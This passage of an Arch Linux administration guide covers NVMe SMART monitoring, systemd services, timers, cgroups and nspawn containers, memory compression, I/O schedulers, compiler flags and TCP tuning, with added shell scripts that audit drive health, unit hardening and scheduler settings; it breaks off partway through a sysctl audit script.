SSDs and NVMe drives don't fail gradually with mechanical clicking sounds. When they die, they do so in a fraction of a second, permanently locking their controller into read-only mode or erasing everything. SMART (Self-Monitoring, Analysis and Reporting Technology) is built into every drive to alert you months before a catastrophic failure.
sudo pacman -S smartmontools
Check the status of your NVMe disk (e.g. /dev/nvme0n1):
sudo smartctl -a /dev/nvme0n1
Pay close attention to the "Percentage Used" and "Critical Warning" lines. If the drive reports reallocated sectors (its spare blocks are running out), it's an imminent sign to buy a new drive and clone the system.
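Reading smartctl output by eye is fine once, but a server should check it on a schedule (for example from a systemd timer like the ones in Chapter 10). The shell function below is an added example, not code from the book or from smartmontools: it parses the "Critical Warning", "Available Spare", "Available Spare Threshold" and "Percentage Used" lines of an NVMe smartctl -a report and exits 0 when the drive looks healthy, 1 when it should be replaced soon (90% or more of its rated endurance used, or spare blocks at or below the drive's threshold) and 2 when the controller has raised a critical warning. The three reports it runs on are constructed samples written to a temporary directory; for a real check, save sudo smartctl -a /dev/nvme0n1 to a file and pass that. The 90% endurance cut-off is my own choice, not a value from the book.

```sh
#!/bin/sh
# Added example (not from the book): triage an NVMe "smartctl -a" report.
# Exit status: 0 healthy, 1 plan a replacement, 2 critical warning raised.

# nvme_health_check REPORT_FILE
nvme_health_check() {
    awk '
        /^Critical Warning:/          { cw = $3 }                    # e.g. 0x00, 0x04
        /^Available Spare:/           { spare = $3 + 0; have_spare = 1 }  # "100%" -> 100
        /^Available Spare Threshold:/ { thr = $4 + 0 }
        /^Percentage Used:/           { used = $3 + 0 }              # rated endurance consumed
        END {
            status = 0
            if (cw != "" && cw != "0x00")
                status = 2                                  # controller flagged a problem
            else if (used >= 90 || (have_spare && spare <= thr))
                status = 1                                  # wearing out / spares exhausted
            verdict = (status == 0) ? "OK" : (status == 1) ? "PLAN REPLACEMENT" : "CRITICAL"
            printf "critical_warning=%s used=%d%% spare=%d%% (threshold %d%%) -> %s\n",
                   (cw == "" ? "n/a" : cw), used, spare, thr, verdict
            exit status
        }' "$1"
}

# --- constructed sample reports (trimmed to the lines the check reads) ---
SMART_DIR=$(mktemp -d)
cat > "$SMART_DIR/healthy.txt" <<'EOF'
=== START OF SMART DATA SECTION ===
SMART overall-health self-assessment test result: PASSED

SMART/Health Information (NVMe Log 0x02)
Critical Warning:                   0x00
Temperature:                        41 Celsius
Available Spare:                    100%
Available Spare Threshold:          10%
Percentage Used:                    3%
EOF

cat > "$SMART_DIR/worn.txt" <<'EOF'
SMART/Health Information (NVMe Log 0x02)
Critical Warning:                   0x00
Available Spare:                    12%
Available Spare Threshold:          10%
Percentage Used:                    97%
EOF

cat > "$SMART_DIR/failing.txt" <<'EOF'
SMART/Health Information (NVMe Log 0x02)
Critical Warning:                   0x04
Available Spare:                    8%
Available Spare Threshold:          10%
Percentage Used:                    61%
EOF

for r in healthy worn failing; do
    nvme_health_check "$SMART_DIR/$r.txt" || echo "  -> exit status $?"
done
```

A SATA drive's report has no "Critical Warning" line; the function then reports it as n/a and judges only by wear, so it does not raise a false critical on such drives.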
9.6.4 Limiting the Journal Size
Paradoxically, the tool that monitors your PC (systemd's journal, read with journalctl) can end up stifling it. If your Wi-Fi card throws an irrelevant error 1000 times per second because its driver is verbose, the binary journal will grow to gigabytes within a month, devouring space on the small SSDs of laptops. Limit the maximum size of the history in /etc/systemd/journald.conf:
[Journal]
SystemMaxUse=500M
Restart the daemon with sudo systemctl restart systemd-journald. From then on, Arch will keep only the most recent half-gigabyte of clinical history, automatically discarding logs from months ago.
Chapter 10: Systemd - Orchestration, Timers, and Advanced Automation ↑ Home
At the heart of almost every modern Linux distribution lies a software suite that inspires both passionate love and deep hatred in the UNIX community: systemd . Originally developed by Lennart Poettering, systemd replaced the older, sequential SysVinit system. Systemd is not just a simple boot program; it's a colossal platform that manages everything from networking and disk mounting to logging, power management (suspend/hibernation), and DNS resolution. It is Process ID 1 (PID 1), the supreme parent of all programs running on your machine.
Mastering systemd means separating the casual user from the systems engineer.
10.1 Architecture and Basic Commands (Systemctl) ↑ Home
The master command for interacting with the init system is systemctl. Everything in systemd is organized into "units". A unit can be a service (a background program, .service), a socket (a listening port, .socket), or a timer (like an alarm clock, .timer).
10.1.1 Service Management (Services)
Traditional daemons like sshd, Nginx, or NetworkManager are unit files ending in .service.
Essential commands (assuming we operate on bluetooth.service):
- Start: Turns it on right now. It won't persist if you restart your PC.
sudo systemctl start bluetooth.service
- Stop: Turns it off (sends a SIGTERM or SIGKILL signal).
sudo systemctl stop bluetooth.service
- Enable: Modifies the system by creating a symbolic link so that the service starts automatically on the next reboot. It does not start it now.
sudo systemctl enable bluetooth.service
- Disable: Breaks that link. It will no longer start with the system.
sudo systemctl disable bluetooth.service
- The Master Shortcut (enable --now): Combines "enable" and "start". Turns it on now and marks it for future startup.
sudo systemctl enable --now bluetooth.service
- Restart: Turns the service off and on again. Required after changing a service's configuration file (e.g., for Nginx or SSH).
sudo systemctl restart bluetooth.service
10.1.2 Targets (The old Runlevels)
In older systems, you used "runlevels" (1 through 6) to tell the PC whether to boot into rescue mode (without graphics) or full mode. Systemd uses the much more flexible concept of "Targets" (Service Groupers).
- multi-user.target: Equivalent to the TTY console level (a server without a graphical interface). It groups all network and console services.
- graphical.target: Equivalent to your desktop environment. It depends on multi-user.target but adds the display managers (GDM/SDDM).
- rescue.target: Starts a root console without network or extra mounted disks (to repair disasters).
If for some reason you want your PC to boot into a pure console by default without starting your heavy graphical environment (to turn a laptop into a server or to save battery), tell systemd to set the default target to the text console:
sudo systemctl set-default multi-user.target
(To revert to graphical mode: sudo systemctl set-default graphical.target.)
10.2 Creating Your Own Unit Files ↑ Home
True power comes when you learn that a .service file isn't a complex C program; it's simply a 10-line, easy-to-read text file. As a developer or sysadmin, you'll want your Python script (a Discord bot, a backup, or a Node.js web app) to run continuously in the background, restart if the bot crashes due to a coding error, and launch automatically.
Create a file called mibot.service in the administrators' sacred directory:
sudo nano /etc/systemd/system/mibot.service
Professional structure of a service for a Node.js app, for example:
[Unit]
Description=Mi Bot de Discord en Node.js
Documentation=https://mi-wiki-interna.com
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
User=francesc
Group=francesc
WorkingDirectory=/home/francesc/proyectos/mi_bot/
ExecStart=/usr/bin/node index.js
Restart=on-failure
RestartSec=5s
Environment="NODE_ENV=production"
Environment="PORT=8080"
[Install]
WantedBy=multi-user.target
In-depth analysis:
- After=network-online.target (boot order). This is vital. It tells systemd that if it tries to start the bot at the 2-second mark of boot but the network (Wi-Fi/Ethernet) isn't available until the 5-second mark, it should hold the bot's start. If you don't set this, the bot will fail immediately for lack of internet access and won't restart.
- User=francesc: Minimized privileges (drop privileges). A web server should NEVER run as root. If someone compromises the bot in Node.js, they will only have access to my user's files, not the entire PC.
- Restart=on-failure: Pure resilience. If the Node.js code crashes or the PC runs out of RAM (OOM killer), systemd will wait 5 seconds and launch a new, clean process, maintaining infinite uptime without your intervention.
After creating or editing any file in /etc/systemd/, the main daemon must reread the directories to integrate the changes before you can use systemctl start:
sudo systemctl daemon-reload
10.3 Systemd Timers: The End of the Cron Era ↑ Home
For decades, UNIX administrators used the cron daemon to schedule recurring tasks. You edited a crontab file and added cryptic lines full of asterisks. Cron had terrible limitations: it didn't generate good logs if the script failed, and if you scheduled a backup for Saturdays at 4 AM and your laptop was off, the task was simply lost (unless you added anacron).
Systemd solved this with timers. A timer is a clock that, when the alarm sounds, automatically triggers the .service file with the same name. It requires writing more lines, but the control, the visibility of the logs (they go to journalctl) and the reliability are vastly superior.
The practical case: a daily backup. We create the service that performs the backup (/etc/systemd/system/respaldo.service):
[Unit]
Description=Ejecuta script Rsync de respaldo de documentos
[Service]
Type=oneshot
ExecStart=/usr/bin/bash /home/francesc/scripts/hacer_backup.sh
User=francesc
(Note: Type=oneshot indicates that the service starts, runs the command, stops, and is marked as successful. It does not run indefinitely.)
We create the timer (alarm clock) with exactly the same name (/etc/systemd/system/respaldo.timer):
[Unit]
Description=Timer para respaldo diario
[Timer]
# Runs every day at 3:00 in the morning
OnCalendar=*-*-* 03:00:00
# If the PC was off at 3 AM, run it as soon as it is switched on
Persistent=true
# Wait a random amount of time, up to 15 minutes (to avoid I/O spikes on servers)
RandomizedDelaySec=15m
[Install]
WantedBy=timers.target
Reload the daemon, then enable and start THE TIMER (never the service; the timer takes care of launching the service):
sudo systemctl daemon-reload
sudo systemctl enable --now respaldo.timer
To view your system's master calendar and check the precise countdown of every automated task:
systemctl list-timers --all
10.4 Performance Audit: systemd-analyze ↑ Home
Systemd knows exactly at what millisecond the kernel started and at what millisecond the graphical environment finished loading. It offers amazing performance profiling utilities for optimization-obsessed administrators.
To see how long it took for your PC to become operational after you pressed the power button:
systemd-analyze
Example output: Startup finished in 3.123s (kernel) + 2.456s (userspace) = 5.579s.
If your system takes 30 seconds to boot (on an SSD) and you feel something is wrong, systemd allows you to generate a list of culprits for each service, ordered by their impact time on boot:
systemd-analyze blame
When reading the list, you'll often find useless services, such as an old disk checker or the infamous NetworkManager-wait-online.service (which blocks startup until it detects a valid real IP address and usually takes 5 to 10 seconds). If you don't run services that must start only once the network is fully ready, you can safely disable it:
sudo systemctl disable NetworkManager-wait-online.service
For the visual engineer, systemd can generate a vector graphic (SVG) that draws an exquisitely detailed Gantt chart showing parallelism, threads, and blocking during startup:
systemd-analyze plot > arranque_pc.svg
Open it with Firefox or Chrome and marvel at the orchestrated engineering that occurs in the first three seconds of your Arch Linux's life.
10.5 CPU and Memory Resource Control (cgroups in Systemd) ↑ Home
Systemd is not just an init system; it's a powerful (text-based) front end for the Linux kernel's Control Groups (cgroups). cgroups are the technology that makes Docker containers possible, and systemd lets you use them directly to tame any troublesome program.
Imagine this scenario: You have an Arch Linux server with 16 GB of RAM. It's running a vital database, and simultaneously, you tell it to process the encoding of a 4K video. The video program will instinctively use 100% of your CPU cores and devour all 16 GB of RAM. The server will freeze (OOM - Out of Memory), and your database's web pages will stop loading for your clients.
You can use systemd to "chain up" that service. Open its unit file (e.g. video-encoder.service):
[Unit]
Description=Proceso pesado de video
[Service]
ExecStart=/usr/bin/ffmpeg -i video.mkv salida.mp4
# Hard cap on RAM. If the process asks for 2.1G, the kernel kills it instantly.
MemoryMax=2G
# Grants the right to use one and a half CPU cores, and not 1% more, no matter how idle the PC is.
CPUQuota=150%
# Lowers its disk priority; if the database wants to read, the video encode waits.
IOWeight=10
After reloading (systemctl daemon-reload), this simple service will be subject to the restrictive physical laws of the Linux kernel. The program will think it's running on a computer from 2005. This is the basic architecture of the cloud servers that sell you tiny virtual machines.
10.5.1 Rapid Injection Modification (Drop-in files)
What if the program hogging RAM is Firefox, which you didn't set up by hand but pacman installed? If you edit the official /usr/lib/systemd/system/firefox.service, pacman will overwrite it at the next update and erase your MemoryMax. The solution is drop-in files (override files). You run:
sudo systemctl edit firefox.service
A blank editor opens. Write only the directives you want to override:
[Service]
MemoryMax=8G
Systemd will automatically create /etc/systemd/system/firefox.service.d/override.conf. On startup it reads the official file and merges your rules on top, without destroying it and keeping your changes safe from updates.
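The User= directive from 10.2 removes root, but systemd can confine a service much further with its sandboxing directives, and a drop-in like the one above is the right place to add them to a unit you did not write. The shell function below is an added example, not code from the book or from systemd: audit_unit reads a unit (or drop-in) file and lists which of a fixed set of systemd.exec hardening directives are missing from its [Service] section, returning the count as its exit status. It runs against two constructed files: the mibot.service from 10.2 and a hardened variant of it. The hardened variant, its ReadWritePaths data directory and the choice of directives are my assumptions; the directive names themselves are standard systemd ones. The real tool for this job is systemd-analyze security <unit>, which scores a loaded unit in detail; this script only checks text, which makes it usable for reviewing files before they reach /etc/systemd/system.

```sh
#!/bin/sh
# Added example (not from the book): list hardening directives absent from a
# unit file's [Service] section. Exit status = number missing (0 = all present).

# Directives checked (all standard systemd.exec settings).
HARDENING_KEYS="User NoNewPrivileges ProtectSystem ProtectHome PrivateTmp \
PrivateDevices ProtectKernelTunables CapabilityBoundingSet RestrictAddressFamilies"

# audit_unit UNIT_FILE
audit_unit() {
    unit=$1
    missing=0
    for key in $HARDENING_KEYS; do
        # Track the current [Section]; only lines inside [Service] count.
        if ! awk -v key="$key" '
                /^\[/ { in_service = ($0 == "[Service]") }
                in_service && $0 ~ ("^" key "[[:space:]]*=") { found = 1 }
                END { exit !found }' "$unit"; then
            echo "missing: $key="
            missing=$((missing + 1))
        fi
    done
    return $missing
}

# --- constructed sample units ---
UNIT_DIR=$(mktemp -d)

# The bot service from 10.2, as written there: drops root but nothing else.
cat > "$UNIT_DIR/mibot.service" <<'EOF'
[Unit]
Description=Mi Bot de Discord en Node.js
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
User=francesc
Group=francesc
WorkingDirectory=/home/francesc/proyectos/mi_bot/
ExecStart=/usr/bin/node index.js
Restart=on-failure
RestartSec=5s
[Install]
WantedBy=multi-user.target
EOF

# A hardened variant (assumed): read-only OS, no setuid escalation, private
# /tmp and /dev, no capabilities, and only IPv4/IPv6 sockets. The data
# directory in ReadWritePaths is a placeholder for wherever the bot writes.
cat > "$UNIT_DIR/mibot-hardened.service" <<'EOF'
[Unit]
Description=Mi Bot de Discord en Node.js (hardened)
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
User=francesc
Group=francesc
WorkingDirectory=/home/francesc/proyectos/mi_bot/
ExecStart=/usr/bin/node index.js
Restart=on-failure
RestartSec=5s
NoNewPrivileges=yes
ProtectSystem=strict
ProtectHome=read-only
ReadWritePaths=/home/francesc/proyectos/mi_bot/data
PrivateTmp=yes
PrivateDevices=yes
ProtectKernelTunables=yes
CapabilityBoundingSet=
RestrictAddressFamilies=AF_INET AF_INET6
[Install]
WantedBy=multi-user.target
EOF

echo "== mibot.service =="
audit_unit "$UNIT_DIR/mibot.service" || echo "   $? directive(s) missing"
echo "== mibot-hardened.service =="
audit_unit "$UNIT_DIR/mibot-hardened.service" && echo "   all present"
```

Note that ProtectSystem=strict makes the whole file system read-only for the service, so anything it must write (its data directory, a log file) has to be listed in ReadWritePaths, otherwise the hardened unit fails at runtime rather than at audit time.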
10.6 Systemd-Nspawn: Integrated Containers (The Chroot on Steroids) ↑ Home
If you read Chapter 15 (Docker) and Chapter 9.4 (arch-chroot), you will have realized that sometimes you need a parallel operating system, but Docker is too complex and the Docker daemon uses extra RAM.
The best-kept secret of Linux distributions is that they come with an ultra-lightweight container system embedded in systemd: systemd-nspawn . It's described as a "Chroot with namespaces and network isolation." Arch engineers use it extensively to compile packages for different architectures or to test viruses/malware in a closed environment without the cumbersome requirements of a virtual machine.
10.6.1 Setting up a pure Debian container inside Arch
Imagine a client requires you to compile an old program, but the necessary libraries are only available in the older Debian or Ubuntu repositories. We'll install the Debian boot tool (debootstrap) on Arch:
sudo pacman -S debootstrap
- Alien OS installation:
We create a directory that will act as the "C:" drive of our container and install the Debian 12 (bookworm) operating system into it.
mkdir ~/mi_debian
sudo debootstrap bookworm ~/mi_debian http://deb.debian.org/debian
In 30 seconds, debootstrap will have downloaded a complete Debian base system (~300 MB).
- Starting the nspawn container:
To "turn on" the machine, we don't use chroot (because it would share your host's processes, which is unsafe). We use nspawn, passing it the root directory (-D = directory).
sudo systemd-nspawn -D ~/mi_debian
In half a second, the prompt changes from [francesc@archlinux] to root@archlinux:~#, but it's not Arch. If you run apt update, you'll see Debian's package manager working. If you run htop, you'll see that the container is isolated: it can't see your Arch Linux processes. You're in a sealed capsule. Exit by typing exit.
10.6.2 Machinectl: Orchestrating Containers
To manage dozens of these nspawn containers like a pro (just as you would manage Docker containers), we use the administrative command machinectl.
If you move your Debian container to the official containers folder (/var/lib/machines/mi_debian), you can instruct Arch's systemd to treat it as a dependent operating system:
- Start in the background:
sudo machinectl start mi_debian
- List running containers:
sudo machinectl list
- Inject yourself (open a shell) into a running container:
sudo machinectl shell mi_debian
- Autostart (so that Debian starts as a service along with your Arch Linux when you turn on your PC):
sudo machinectl enable mi_debian
Mastering cgroups and nspawn means possessing divine power over the atoms and processes of distributed computing, all with tools that have always been hidden, by default, in your base Arch Linux installation.
Chapter 11: Extreme Optimization and Hardware Performance ↑ Home
The goal of installing Arch Linux is often not just minimalism, but the ruthless extraction of every last drop of performance from your processor (CPU), memory (RAM), and storage (SSD/NVMe). By avoiding the bloat of other distributions, Arch gives you a clean foundation, but there are kernel-level and compiler levers that remain in conservative positions by default to ensure compatibility with hardware from 15 years ago.
In this chapter, we're going to break that backward compatibility in favor of pure speed, optimizing the generic operating system into a tailor-made suit for your current silicon.
11.1 Memory Management and On-the-Fly Compression (Zram and Zswap) ↑ Home
Historically, when RAM became full, the kernel would "page" (move) static memory blocks to the hard drive (swap partition). In the era of mechanical hard drives, this slowed the machine to unusable levels. In the SSD era, it's faster, but constantly writing gigabytes of memory to the SSD destroys its memory cells (limited write cycles/terabytes written).
The modern solution, born in Android and ChromeOS systems, is to use RAM compression.
11.1.1 Zswap (For systems with a physical Swap partition)
Zswap is a kernel module that acts as a compression cache. When the system decides to swap a memory page to the SSD, Zswap intercepts it, compresses it (to about 30% of its original size using fast algorithms like zstd or lz4), and stores it in reserved space within RAM . If Zswap fills up, it overflows and sends the data to the disk. Zswap is ideal because it leverages your existing swap partition, drastically reducing SSD wear.
To enable it at startup, we edit the kernel parameters in GRUB:
sudo nano /etc/default/grub
In the GRUB_CMDLINE_LINUX_DEFAULT line, add:
zswap.enabled=1 zswap.compressor=zstd zswap.zpool=z3fold zswap.max_pool_percent=20
- zswap.compressor=zstd: An algorithm of very high efficiency and decent speed.
- zswap.zpool=z3fold: Allows up to 3 compressed pages to be packed into a single physical page.
- zswap.max_pool_percent=20: Tells Zswap that it can use up to 20% of your total RAM for this emergency compression.
Update GRUB with sudo grub-mkconfig -o /boot/grub/grub.cfg and reboot.
11.1.2 Zram (For systems WITHOUT a swap partition on disk)
If you decided to be bold and not create a swap partition on your SSD, Zram is a must. Zram tricks the system by creating an artificial hard drive (Block device) that resides entirely in RAM and applies continuous compression to it. It's the fastest and most modern method, strongly recommended by Fedora.
Installation using the systemd generator:
sudo pacman -S zram-generator
Create the configuration file:
sudo nano /etc/systemd/zram-generator.conf
Add the following:
[zram0]
# Creates a zram block equal to 50% of the total available RAM
zram-size = ram / 2
compression-algorithm = zstd
# Use it as the highest-priority swap on the system
swap-priority = 100
fs-type = swap
Reload systemd and activate it on the fly:
sudo systemctl daemon-reload
sudo systemctl start systemd-zram-setup@zram0.service
Use the zramctl command to monitor in real time how many megabytes you are saving through compression.
11.2 I/O Schedulers and CPU Governors ↑ Home
The Linux kernel acts like an orchestra conductor. It decides which program has the right to communicate with the disk and for how long, and at what speed the processor should vibrate.
11.2.1 The Input/Output Scheduler
Not all disks are the same. A mechanical hard disk drive (HDD) needs a scheduler that groups reads of data physically close together on the platter, so as not to waste time moving the magnetic read/write head: bfq (Budget Fair Queuing). NVMe SSDs have no moving parts, so the bottleneck is simply how many concurrent commands the memory chip can process. For modern SSDs and NVMe drives, the mq-deadline or kyber scheduler is highly recommended.
Check which scheduler you are using on your disk (e.g., nvme0n1):
cat /sys/block/nvme0n1/queue/scheduler
The selected option appears in brackets, e.g. [none] mq-deadline kyber bfq (on very fast NVMe drives, none delegates all the work to the drive's controller, which is the optimal option).
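The bracketed name in queue/scheduler is easy to misread, and the choice between bfq and a non-rotational scheduler hinges on the queue/rotational flag that the udev rule below keys on. The shell functions here are an added example, not code from the book: current_scheduler extracts the active scheduler from a queue/scheduler file, recommend_scheduler applies the rule of this section (bfq for rotational disks, none for NVMe, mq-deadline for other SSDs and eMMC; choosing mq-deadline over kyber is my pick), and audit_schedulers reports every device whose active scheduler differs from that recommendation. They run against a constructed fake sysfs tree in a temporary directory with three invented devices; point audit_schedulers at /sys/block for the real thing. A value written to queue/scheduler by hand is lost at reboot; the udev rule is the persistent form.

```sh
#!/bin/sh
# Added example (not from the book): read and audit I/O schedulers through the
# sysfs queue/ interface. Runs on a constructed fake tree by default.

# current_scheduler DEV_DIR -> prints the bracketed (active) scheduler
current_scheduler() {
    # the file looks like: "[none] mq-deadline kyber bfq"
    sed -n 's/.*\[\([^]]*\)\].*/\1/p' "$1/queue/scheduler"
}

# recommend_scheduler DEV_DIR -> bfq | none | mq-deadline, by this section's rule
recommend_scheduler() {
    dev=${1##*/}
    rotational=$(cat "$1/queue/rotational")
    if [ "$rotational" = 1 ]; then
        echo bfq                       # spinning disk: minimise head movement
    else
        case $dev in
            nvme*) echo none ;;        # fast NVMe: let the controller queue
            *)     echo mq-deadline ;; # SATA SSD / eMMC
        esac
    fi
}

# audit_schedulers SYS_BLOCK_DIR -> one line per device; exit status = mismatches
audit_schedulers() {
    mismatches=0
    for d in "$1"/*; do
        [ -f "$d/queue/scheduler" ] || continue
        active=$(current_scheduler "$d")
        wanted=$(recommend_scheduler "$d")
        if [ "$active" = "$wanted" ]; then
            state=ok
        else
            state="change to $wanted"
            mismatches=$((mismatches + 1))
        fi
        printf '%-10s rotational=%s active=%-11s %s\n' \
            "${d##*/}" "$(cat "$d/queue/rotational")" "$active" "$state"
    done
    return $mismatches
}

# --- constructed fake /sys/block with three invented devices ---
FAKE_SYS=$(mktemp -d)
mkdev() {   # mkdev NAME ROTATIONAL "scheduler line as sysfs would show it"
    mkdir -p "$FAKE_SYS/$1/queue"
    echo "$2" > "$FAKE_SYS/$1/queue/rotational"
    echo "$3" > "$FAKE_SYS/$1/queue/scheduler"
}
mkdev sda     1 "[none] mq-deadline kyber bfq"    # HDD still on none: should be bfq
mkdev nvme0n1 0 "[none] mq-deadline kyber bfq"    # NVMe on none: fine
mkdev mmcblk0 0 "none mq-deadline kyber [bfq]"    # eMMC on bfq: should be mq-deadline

audit_schedulers "$FAKE_SYS" || echo "$? device(s) would change"
```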
To force bfq (if you have a slow HDD and notice that your PC freezes when downloading a large file), create a udev rule:
sudo nano /etc/udev/rules.d/60-ioschedulers.rules
Paste:
ACTION=="add|change", KERNEL=="sd[a-z]|mmcblk[0-9]*", ATTR{queue/rotational}=="1", ATTR{queue/scheduler}="bfq"
11.2.2 CPU Governors (cpupower)
Modern CPU scaling technology (P-State on Intel, CPPC on AMD) lets the motherboard control the voltage. By default, Arch uses the powersave or schedutil governor, which saves energy by lowering the CPU clock to 800 MHz when you're not doing anything and boosting it to 4.5 GHz when you open a program.
On desktop computers (without a battery to manage), this causes milliseconds of latency that purist gamers despise. You can force perpetual performance mode using cpupower.
sudo pacman -S cpupower
Edit the base configuration (/etc/default/cpupower) and look for the governor variable:
governor='performance'
Enable the daemon:
sudo systemctl enable --now cpupower.service
(Note: your PC will consume about 15W or 20W more power when idle and will generate more heat, but the system's responsiveness when clicking or opening windows will be absolute.)
11.3 Binary Forging (Optimizing makepkg.conf) ↑ Home
As an Arch Linux user, you'll install dozens of programs from the AUR over your lifetime. In doing so, you download plain source code (C, C++, Rust) and use makepkg (the build wrapper around the compiler) to translate it into binary code on your own computer.
By default, Arch developers configure the GNU Compiler Collection (GCC) flags very generically: they assume you want to build a binary compatible with any CPU (from a 2004 Intel Pentium 4 to a 2024 Ryzen 9). To achieve this backward compatibility, GCC disables the use of advanced mathematical vectorization instructions (such as AVX2 and AVX-512) that are physically present in your modern CPU and could perform physics, compression, or cryptography calculations up to 10 times faster.
Let's tell GCC: "Know the hardware you're running on and compile code that only works here, but runs faster than light . "
Open the compiler master file:
sudo nano /etc/makepkg.conf
11.3.1 Native Architecture (CFLAGS and CXXFLAGS)
Find the line that begins with CFLAGS=. It will be preconfigured with -march=x86-64 -mtune=generic. Change it to -march=native: this single word enables all the specific silicon features of your chip. We'll also add one more flag, -O3 (optimization level 3), which asks GCC to unroll mathematical loops in the source code, consuming more time and RAM during compilation but generating a final program that runs incredibly fast.
CFLAGS="-march=native -O3 -pipe -fno-plt -fexceptions ..."
CXXFLAGS="$CFLAGS" # C++ copies the same flags as C
11.3.2 LTO (Link Time Optimization)
In a C program, the code is divided into hundreds of small files. Traditionally, the compiler translates them separately and then links them together. If you enable Link Time Optimization (LTO), the compiler reads all the files at once and can see that a function in file A calls a function in file B that doesn't actually do anything, and removes or restructures them. LTO reduces the program's size (RAM) and greatly increases speed.
Look for the OPTIONS=() line at the end of the file. It contains options such as (strip docs !libtool !staticlibs ...). Add lto without the exclamation mark to activate it:
OPTIONS=(strip docs !libtool !staticlibs emptydirs zipman purge !debug lto)
11.3.3 Parallelism in Compilation (MAKEFLAGS)
If your CPU has 16 threads and you compile a browser like Chromium (which takes 4 hours), by default makepkg will use a single core, and it will take... 3 days. We need to tell the make program to launch as many "workers" as your CPU has logical cores. You can find out how many logical cores you have with the nproc command (let's say you have an 8-core processor).
Find the MAKEFLAGS variable and uncomment it:
MAKEFLAGS="-j8"
(Pro tip: use -j9, i.e. the number of your cores + 1. This way, if one core gets stuck waiting to read from disk, the extra thread takes over.)
11.3.4 Goodbye to Final Compression
When the compilation of a huge piece of software completes successfully, the final step of makepkg is to take all the generated files and compress them into a single .pkg.tar.zst file so that pacman can install it, or so you can give it to a friend. This massive compression (for something like Firefox or Chrome) requires your processor to run at 100% for extended periods.
If you're never going to share your compiled packages with other computers over a network and will only install them on your own PC, compressing them is a stupid waste of time and energy. Look for the PKGEXT variable toward the end of the file and tell makepkg to use the humble uncompressed tar format:
PKGEXT='.pkg.tar'
By implementing all these changes, you will have forged an unparalleled software build system. Your AUR packages will compile in minutes using 100% of the processor, generate assembly code perfectly tailored to the mathematical peculiarities of your chip (AVX-512, SSE4), and dispense with unnecessary compression at the end of the process.
You've fine-tuned your Arch Linux like a Formula 1 car.
11.4 Underlying Memory Acceleration (HugePages and PGO) ↑ Home
The standard Linux operating system manages RAM by dividing it into 4-kilobyte "pages." If a program like a virtual machine, a 20GB database, or a modern open-world game needs 8 gigabytes of RAM, the processor has to fetch, scan, and map 2 million separate pages. This causes a phenomenon called "TLB Miss" (Translation Lookaside Buffer Miss) within your CPU, resulting in micro-stutters and massive latency bottlenecks.
11.4.1 Transparent HugePages (THP)
The architectural solution is to use HugePages. The kernel allows memory to be grouped into blocks of 2 Megabytes, and even 1 Gigabyte.
By default, Arch Linux has THP in the madvise state (huge pages are only used if a program explicitly requests them from the kernel). For heavy loads, we can force the kernel to always try to group memory into large blocks transparently.
We'll create a rule to inject this behavior when the machine powers on, using systemd-tmpfiles:
sudo nano /etc/tmpfiles.d/thp.conf
Add the following lines:
w /sys/kernel/mm/transparent_hugepage/enabled - - - - always
w /sys/kernel/mm/transparent_hugepage/defrag - - - - defer+madvise
After a reboot, the kernel will map giant blocks. In console emulators (RPCS3, Yuzu/Ryujinx) or in Redis databases, the performance improvement can exceed 15% immediately.
11.4.2 Profile-Guided Optimization (PGO)
We mentioned -O3 earlier in this chapter for the compiler. But GCC isn't a mind reader: it doesn't know how you use a program. Profile-Guided Optimization (PGO) is the ultimate compiler wizardry. The process works like this:
- You compile your C/C++ code adding an instrumentation flag (-fprofile-generate).
- The compiler generates an instrumented "spy" program (very slow).
- You use that program for a few minutes, making it perform its most demanding tasks (opening windows, calculating routes). The program saves statistical files (profiles).
- You recompile the original source code, this time with the -fprofile-use flag, feeding it the files from step 3.
The compiler now statistically knows that mathematical function A is called 1 million times per second, and function B is never called. GCC will reorder the binary code, placing function A right at the top of your CPU's L1 cache. Browsers like Firefox and the Linux kernel itself can be compiled with PGO and LTO simultaneously (via the AUR using packages like firefox-pgo), achieving an agility that borders on the absurd.
11.5 Optimizing the TCP/IP Network Stack (Ring 0) ↑ Home
Even if your Internet Service Provider (ISP) promises you "1 Gigabit", it's very lik
ely that your download speeds and response times are being throttled by your own computer. By default, the Linux kernel uses TCP congestion control algorithms designed in the 1980s for unreliable analog networks.
If we use Arch Linux, we can enable the algorithms designed by Google for its own YouTube servers (TCP BBR), created explicitly to maximize bandwidth and sink latency.
11.5.1 TCP BBR (Bottleneck Bandwidth and RTT)
BBR doesn't try to guess if the network is congested by counting lost packets (as the old algorithm does). BBR continuously measures how fast the pipeline can send data and pumps it at a precise mathematical rate to never fill the buffer (avoiding internal bufferbloat).
To enable BBR persistently, we will set kernel parameters through sysctl:
sudo nano /etc/sysctl.d/99-bbr.conf
Add the following lines:
net.core.default_qdisc = fq
net.ipv4.tcp_congestion_control = bbr
(Using the fq scheduler, strictly instead of fq_codel, is mandatory for BBR to work at its full potential.)
11.5.2 TCP Fast Open (Shortening the Handshake)
When you visit a secure website (HTTPS), your PC and the server perform a three-step "dance" (SYN, SYN-ACK, ACK) before a single image is sent to you. TCP Fast Open (TFO) lets your PC store a cryptographic cookie after the first visit, so that on subsequent visits the web request travels inside the SYN greeting itself, skipping the dance. Add the following to the same sysctl file:
net.ipv4.tcp_fastopen = 3
(The value 3 activates TFO for both outgoing and incoming connections, vital if you run a local Nginx.)
11.5.3 Explicit Congestion Notification (ECN)
Finally, we'll enable ECN. It allows intermediate routers (your ISP's) to mark packets with a "Caution, I'm overloaded" bit instead of simply discarding them, which would force your Arch Linux system to resend them from scratch, causing lag in games.
net.ipv4.tcp_ecn = 1
After writing everything, instruct the kernel to load the changes on the fly without rebooting:
sudo sysctl --system
Your network stack has evolved three decades in five lines of text. Your upload performance to remote servers (e.g., uploading files from Spain to Japan) will see an exponential increase in stability and sustained MB/s.
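Before running sysctl --system it is worth checking that the fragment is internally consistent: BBR without fq, or a typo in a value, silently leaves you with the old behaviour. The shell functions below are an added example (not from the original book) that parse a sysctl.d file the way sysctl --system does (last assignment wins, comments ignored) and flag the combinations discussed above. The two sample files are constructed here and the function names are my own.

```shell
#!/bin/sh
# Added example: audit a sysctl.d fragment for the BBR/TFO/ECN settings above.
# Function names and the two sample files are constructed for this example.

# Constructed sample: the file exactly as the section builds it.
GOOD_CONF=$(mktemp)
cat > "$GOOD_CONF" <<'EOF'
# /etc/sysctl.d/99-bbr.conf (constructed sample)
net.core.default_qdisc = fq
net.ipv4.tcp_congestion_control = bbr
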